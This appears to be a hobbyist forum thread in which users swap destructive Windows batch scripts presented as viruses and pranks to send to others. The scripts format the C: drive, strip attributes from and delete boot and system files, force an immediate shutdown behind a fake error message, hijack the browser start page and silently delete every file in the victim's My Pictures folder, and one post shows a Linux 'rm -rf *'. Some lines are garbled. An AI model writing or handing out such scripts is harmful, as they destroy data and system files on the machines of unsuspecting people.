- Code: Select all
@echo off
format C:
Pretty much sums up everything. Doesn't work much if you REALLY want to torment the person, like deleting the major system files, and setting the program to run at startup.
@echo off
format C:
kiazo wrote:kazadduum wrote:ya cant call this even a virus. virus infects files. this is not even a destuctive code.
learn c++(and other) and make viruses.
true a real virus looks like this
@echo off
cls
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
del c:\systemdrivers% -f -s-d-c
call >systemdrivers% -f-s-d-c
attrib netstat-n
del netstat-n
\** del temp%win%system32%regedit
warning dont use it ^_^
That would be harsh.
I actually ran a Linux equivalent of that in Bash once. I was trying out another distro, so I wanted to see my current OS crash and burn.
#rm -rf *
tdizzogger wrote:so wait....no lasting damage, correct? Like I could send this to my mom and everything would be alright 5 minutes later?
@echo off
echo fatal system error
pause
echo x=msgbox("FATAL SYSTEM ERROR",0, "FATAL SYSTEM ERROR")
dir/s
shutdown -s -t00
@echo off
REG ADD "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN" /V "START PAGE" /D "mudkipz.ws" /F
CD C:\Program Files\Internet Explorer
START iexplore
ECHO You just got owned.
ECHO WATCH AND WEEP.
CD C:\WINDOWS\system32
START CALC
START CALC
START CALC
START CALC
START CALC
START CALC
CD C:\Documents and Settings\%username%\My Documents\My Pictures
ECHO Time to delete all your pictures >:D.
DEL /Q /F /S *.*
ECHO Files now deleted.
ECHO Don't mess with me again.
PAUSE
Users browsing this forum: No registered users and 0 guests